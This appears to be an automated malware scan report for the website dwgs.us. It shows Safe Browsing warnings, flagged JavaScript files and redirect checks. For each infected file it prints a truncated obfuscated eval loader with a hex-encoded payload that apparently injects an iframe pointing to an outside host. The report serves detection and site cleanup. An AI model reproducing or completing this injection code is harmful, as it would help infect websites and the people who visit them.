Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dwgs.us
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dwgs.us/ | 200 OK Content-Length: 9209 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_79_69_75_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_79_69_75_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_7d_7a_6a_77_74_71_76_73_7b_36_77_7a_6f_6e_7a_6d_6d_36_6b_77_75_37_6c_77_6b_7d_75_6d_76_7c_69_7c_ Antivirus reports:
| ||
http://dwgs.us/media/system/js/caption.js | 200 OK Content-Length: 6514 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_71_7f_7b_72_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_71_7f_7b_72_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_7d_7a_6a_77_74_71_76_73_7b_36_77_7a_6f_6e_7a_6d_6d_36_6b_77_75_37_6c_77_6b_7d_75_6d_76_7c_69_ Antivirus reports:
| ||
http://dwgs.us/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 26627 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_71_7f_7b_72_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_71_7f_7b_72_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_7d_7a_6a_77_74_71_76_73_7b_36_77_7a_6f_6e_7a_6d_6d_36_6b_77_75_37_6c_77_6b_7d_75_6d_76_7c_69_ Antivirus reports:
| ||
http://dwgs.us/plugins/system/shadowbox/shadowbox.js | 200 OK Content-Length: 26942 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_71_7f_7b_72_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_71_7f_7b_72_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_7d_7a_6a_77_74_71_76_73_7b_36_77_7a_6f_6e_7a_6d_6d_36_6b_77_75_37_6c_77_6b_7d_75_6d_76_7c_69_ Antivirus reports:
| ||
http://dwgs.us/test404page.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dwgs.us
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 17 Sep 2014 03:36:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: dsgfdg34g=1; expires=Wed, 24-Sep-2014 03:36:24 GMT
GET / HTTP/1.1
Host: dwgs.us
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 17 Sep 2014 03:36:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: dsgfdg34g=1; expires=Wed, 24-Sep-2014 03:36:24 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: dwgs.us
Referer: http://www.google.com/search?q=dwgs.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dwgs.us
Referer: http://www.google.com/search?q=dwgs.us
Result:
The result is similar to the first query. There are no suspicious redirects found.